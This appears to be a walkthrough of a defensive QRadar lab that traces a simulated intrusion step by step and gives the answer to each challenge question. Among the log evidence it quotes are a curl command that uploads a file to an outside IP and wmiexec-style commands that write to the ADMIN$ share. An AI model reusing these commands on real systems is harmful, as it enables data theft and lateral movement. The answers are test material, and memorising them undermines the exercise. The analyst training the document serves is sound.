The Walkthrough
Last updated
Last updated
Steps:
1. Navigate to the Admin tab.
2. Select Log Sources.
Answer: 15
Looking at the log sources again we’ll find that the IDS (Intrusion Detection System) software used to monitor the network in this environment is : Answer: Suricata.
Search Windows Authentication Logs
Go to Log Activity in QRadar.
Use filters or search for logs with:
Event Name: "Logon"
Or Event ID: 4624 (Successful Logon) and open any log you fine.
Look at fields such as:
Account Domain
TargetDomainName
DomainName
These fields usually contain the domain name used in the environment.
🕒 Note: The Start Time for the logs is 1/1/2020, so make sure to set the time range accordingly when searching Answer: HACKDEFEND.local
· I went to Log Activity in QRadar.
· Changed the display columns to show Source IP.
· Filtered logs for communications with the malicious server.
· From the list of source IPs, I looked for the one ending with "20".
Answer: 192.168.20.2
· I searched logs by Rule SID in QRadar.
· Sorted or filtered to find the most frequent SID triggered in the dataset.
Answer: 2027865
I found this IP in the offense titled:
"Excessive Firewall Denies Between Hosts"
Important Notes:
Evidence
Explanation
Source IP
It's the initiator of the offense. This means 192.20.80.25 attempted to connect to many hosts but got blocked.
Firewall Denies
The connections were denied by firewall rules → typical of scanning or probing attempts.
Multiple Targets
It's categorized as “Between Hosts” → meaning it likely tried several destinations.
No Specific User
User field = N/A → suggests automation (e.g., script/tool), not a legit login attempt.
Magnitude
Medium → serious enough to be flagged as a potential threat.
ANSWER: 192.20.80.25
Step 1: Initial IP-Based Search
I started by filtering logs related to the attacker’s IP address 192.20.80.25 to find any activity linked to the project name.
Result: No relevant logs were found linked directly to this IP.
Step 2: Searching for File Access Commands
To dig deeper, I searched for PowerShell commands that list or search files using the filter:
Payload Matches Regular Expression: Get-ChildItem
· Get-ChildItem is a PowerShell command used to list files and folders (like `dir` in Windows).
Step 3: Analyzing the Results
The logs showed the following command being run: value="C:\Users\nour.HACKDEFEND" ParameterBinding(Get-ChildItem): name="Filter"; value="project48"
This indicates the user was searching inside the folder C:\Users\nour.HACKDEFEND for files or folders matching the name project48.
Step 4: The project name
From the PowerShell command filter, I identified that project48 is the project name the attacker was searching for.
This was not directly linked to the attacker IP in the logs but was found through their actions on the compromised user account.
ANSWER: project48
Step 1: Filter Logs by Attacker’s IP
I applied a filter in QRadar to show all logs related to the attacker's IP:
Step 2: Sort Logs by Time
I sorted the logs in ascending order (from oldest to newest) to identify the earliest interaction.
Step 3: Analyze the First Connection
The first internal IP that communicated with the attacker was: 192.168.10.15
ANSWER: 192.168.10.15
Step 1: Filter Logs in Qradar
· I applied the following filters in the Log Activity tab:
o Source IP = 192.168.10.15
o EventID (custom) = 4624
Step 2: Analyze the Logon Event
Event ID 4624 represents a successful logon in Windows.
The log showed that the user who logged in from this IP is: nour
ANSWER: nour
1. Filtered QRadar logs where:
o Payload Contains is Microsoft-Windows-PowerShell/Operational
o Username is any of nour
2. I reviewed all the resulting logs for signs of the attacker checking logging status (e.g., using Get-WinEvent, wevtutil, or similar commands).
3. I found multiple logs showing:
o PowerShell command executions
o Log source: Microsoft-Windows-PowerShell/Operational
o Username: nour
o Source IP: 192.168.10.15
Although there were no specific commands confirming the attacker explicitly checked logging settings (e.g., Get-WinEvent -LogName), the presence of logs from the Microsoft-Windows-PowerShell/Operational channel confirms that PowerShell logging was enabled, and the attacker’s activity was being recorded.
So, while we cannot confirm the attacker checked the log status, we do know:
The attacker's actions were captured in the Operational PowerShell log.
ANSWER: PowerShell
I filtered logs using:
EventID is any of 4624 (Successful logon events)
we got this :
1. Review the log entries related to the attacker’s activity.
2. Check the Computer field and Logon Type in “the Payload itself”:
3. The log from HD-FIN-02 shows Logon Type 5, which is a service or system logon — usually normal and not related to attacker lateral movement.
4. The log from MGNT-01 shows Logon Type 3, which means a network logon, indicating a remote connection likely used by the attacker to move laterally.
5. Because of this, MGNT-01 is identified as the second system the attacker targeted to cover up the infected employee.
ANSWER: MGNT-01
I filtered the logs using these :
Event ID 3 in Sysmon = Network Connection Detected. And I got this result after sorting by time:
Now we should look into the first log to see the payload information, here it is :
And what happened here is:
· a network connection was initiated by Notepad.exe and detected where the process C:\Windows\SysWOW64\notepad.exe initiated an outbound TCP connection to 192.168.20.20 on port 389 (LDAP).
· The target port is 389 (LDAP), commonly used for querying Active Directory – a behavior typical of reconnaissance or credential access techniques.
So, ANSWER: 11:14:10
Filters Used in QRadar:
Source IP = 192.168.10.15
Payload Contains = hash
What I Found:
A FileCreateStreamHash event from host HD-FIN-03
Opened the log and found the MD5 hash
ANSWER: 9D08221599FCD9D35D11F9CBD6A0DEA3
What I Did:
· I applied the filter Payload Contains HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run to focus on registry events related to the Run key in the Windows registry, which is often used for persistence.
· I also filtered EventID to 13, which corresponds to Registry Value Set events in Sysmon logs, showing changes or creation of registry values.
· Combining these filters helped me find registry modifications where the attacker set a value under the Run key, indicating attempts to maintain persistence.
· A suspicious registry key created by powershell.exe that sets a value under this Run key pointing to a malicious script C:\Windows\TEMP\PjvQTe.vbs.
· This registry path is a common persistence mechanism that runs the specified program every time the system or user logs in.
Event Type: Registry value set
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\SsGHOMcjsj
This is a Run key being created — it makes programs run automatically on system startup → persistence mechanism.
Process Used:
Image: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
Using PowerShell to modify the registry is suspicious, especially when writing to the Run key.
Value Set (Payload):
Details: C:\Windows\TEMP\PjvQTe.vbs
This means: PowerShell added a script (PjvQTe.vbs) to run every time the system starts. This .vbs file is likely part of a malware loader or script used by the attacker.
MITRE Technique Used:
Technique Name: Registry Run Keys / Startup Folder
Technique ID: T1547.001
MITRE Tactic: Persistence
Why This Matters:
This technique allows the attacker’s malware to automatically start on each boot or logon, ensuring persistent access to the compromised system.
ANSWER: T1547.001
You look for ICMP first because it’s the most common, lightweight, and early indicator of host discovery — like the attacker knocking on doors to see who’s home.
What I Did:
Step 1: Think about scanning protocols
Attackers often use protocols like:
ICMP (ping)
TCP SYN scans
UDP scans
Sometimes even ARP (on the local network)
Step 2: Focus on the first compromised machine
From earlier analysis, we know the first compromised machine is 192.168.10.15.
Step 3: Explore network logs from this IP
In QRadar, I filtered:
Log Source = Zeek (because it logs low-level protocol activity)
Source IP = 192.168.10.15
Protocol ≠ TCP/UDP → This helps isolate ICMP or other layer 3 traffic
Open any log :
ANSWER: ICMP
· Since you want to identify the email service, looking at DNS activity is important.
· Zeek’s DNS logs give you exact queries for MX records or mail-related domain lookups.
· Other log sources might not capture DNS at this level of detail or may only show partial information.
Step 1: Apply Filters to Logs
Filter the Zeek connection logs with the following criteria:
Destination port is 53 (DNS traffic)
Source IP is within the subnet 192.168.20.0/24 (internal network)
Log source is Zeek_conn
Step 2: Review Filtered Logs
Analyze the filtered DNS query logs to identify external destination IP addresses frequently contacted by internal hosts.
The logs show multiple queries to IPs such as:
13.107.24.3
13.107.24.4
13.107.160.4
13.107.252.10
40.90.4.205
64.4.48.201
64.4.48.205
40.90.4.2
Step 3: Research IP Address Ownership
Looked up the IP address 13.107.24.4 on an IP information service (e.g., ipinfo.io) to determine its owner and associated service.
The lookup confirmed that this IP belongs to Microsoft and is linked to office365 services.
The IPs belong to Microsoft’s cloud hosting Office365 email service.
ANSWER: office365
· Apply these filters:
· Source IP is 192.168.10.15 → the infected machine.
· Payload Contains is hash → to find logs mentioning hashes.
· Payload Contains is targetfilename → to find logs that mention the name of the file.
Review the matching logs:
Look for a log that includes:
A file name (usually after targetFilename=)
ANSWER: important_instructions.docx
Based on this filter:
EventID = 4720 → means “A user account was created”
And we found:
Account Name: rambo
ANSWER: Rambo
Applied the following filter:
EventID = 8 (This Sysmon Event ID 8, which logs CreateRemoteThread activity – typically used in process injection.)
From the log:
SourceProcessId is the process performing the injection.
TargetProcessId is the process being injected into.
ANSWER: 7384
QRadar filters are:
cmd in CommandLine ➜ attacker used Command Prompt.
ADMIN$ in CommandLine ➜ attacker accessed a hidden admin share (common in lateral movement).
EventID = 1 ➜ you're seeing new process creations (from Sysmon).
ð This helps detect lateral movement using CMD and ADMIN$ share.
I got this result:
· I noticed this command in the Sysmon logs:
· To investigate further, I googled this: cmd.exe /Q /c dir 1> \127.0.0.1\ADMIN$
· Within the GitHub page, a section under "WMIExec" provided the following detail:
“By default this command is executed: cmd.exe /Q /c cd 1> \127.0.0.1\ADMIN$__RANDOM 2>&1”
This pattern matches the original Sysmon log almost exactly, strongly suggesting the use of wmiexec.py from the Impacket toolkit.
Each displayed command-line executions similar to: cmd.exe /Q /c whoami 1> \127.0.0.1\ADMIN$__1604913874.5822518 2>&1 cmd.exe /Q /c reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 1> \127.0.0.1\ADMIN$__1604913874.5822518 2>&1
These logs confirmed consistent WMIExec-like behavior across the network.
ð Conclusion
Based on the evidence collected:
· The command-line structure is consistent with wmiexec.py.
· Redirection to the ADMIN$ share is a strong indicator of this tool.
· GitHub documentation confirms the behavior.
ANSWER: wmiexec.py
Filtered Logs
Used filter: payload contains is curl
Got This:
Found Evidence:
Matching command line: cmd.exe /Q /c curl -X PUT --upload-file sami.xlsx http://192.20.80.25:8000 1> \\127.0.0.1\ADMIN$\__1604917392.4554174 2>&1
This command shows an HTTP PUT request using curl to upload the file sami.xlsx to an external server.
ANSWER: curl
Steps:
Filter applied:
Username is not N/A
Username is not any of [sarah, nour, admin, Administrator]
Extracted relevant events:
Looked for specific event:
I looked for the event "Successful logon with administrative or special privileges".
Result found:
This event appeared 4 times related to the user Adam.
ANSWER: Adam
Filters Used in QRadar:
Source IP = 192.168.10.15
Payload Contains = icmp
Log Source = Zeek_conn
What I Found:
Multiple ICMP connections from 192.168.10.15 to IPs in the range 192.168.20.1 to 192.168.20.30.
This shows scanning activity across this subnet
ANSWER: 192.168.20.0
Filter by IP address :
Filter events where Source or Destination IP is 192.20.80.25 (the suspicious external server)
Exclude internal IPs that are not 192.168.10.15 or 192.168.20.20 (to focus on other internal hosts interacting with the external IP)
⚠️ NOTICE:
192.168.10.15 => First infected machine
192.168.20.20 => The Domain Controller
Sort the filtered events by Time
Sort events ascending or descending by timestamp to see activity in order
Identify relevant events
Look for events like Zeek_HTTP, NIDS Alert (SO-Suricata), or Zeek_conn that show communication between internal Ip that we found 192.168.10.29 and 192.20.80.25.
Inspect payload or detailed log info
Enter the first event in the list
Look at the payload or log message for clues such as file names, commands, or usernames
This log shows an HTTP PUT of file sami.xlsx from IP 192.168.10.29 to 192.20.80.25
The filename sami.xlsx indicates the employee's name is Sami
We can get the employee’s name from question #21, by the way 😉
ANSWER: Sami
In this QRadar101 guide, we learned how to use QRadar step-by-step to find important security events. By filtering and sorting events, we tracked suspicious activity and even found the employee linked to the attacker — Sami. These simple but powerful skills are the building blocks for anyone wanting to become a great security analyst. Keep practicing, and you’ll get faster and smarter at spotting threats and protecting your organization.
This offense means that one host (192.20.80.25) tried to connect to many internal systems, but all those attempts were denied by the firewall.
o cmd.exe /Q /c dir 1> ...
· One of the top results was a page from 🔗 :
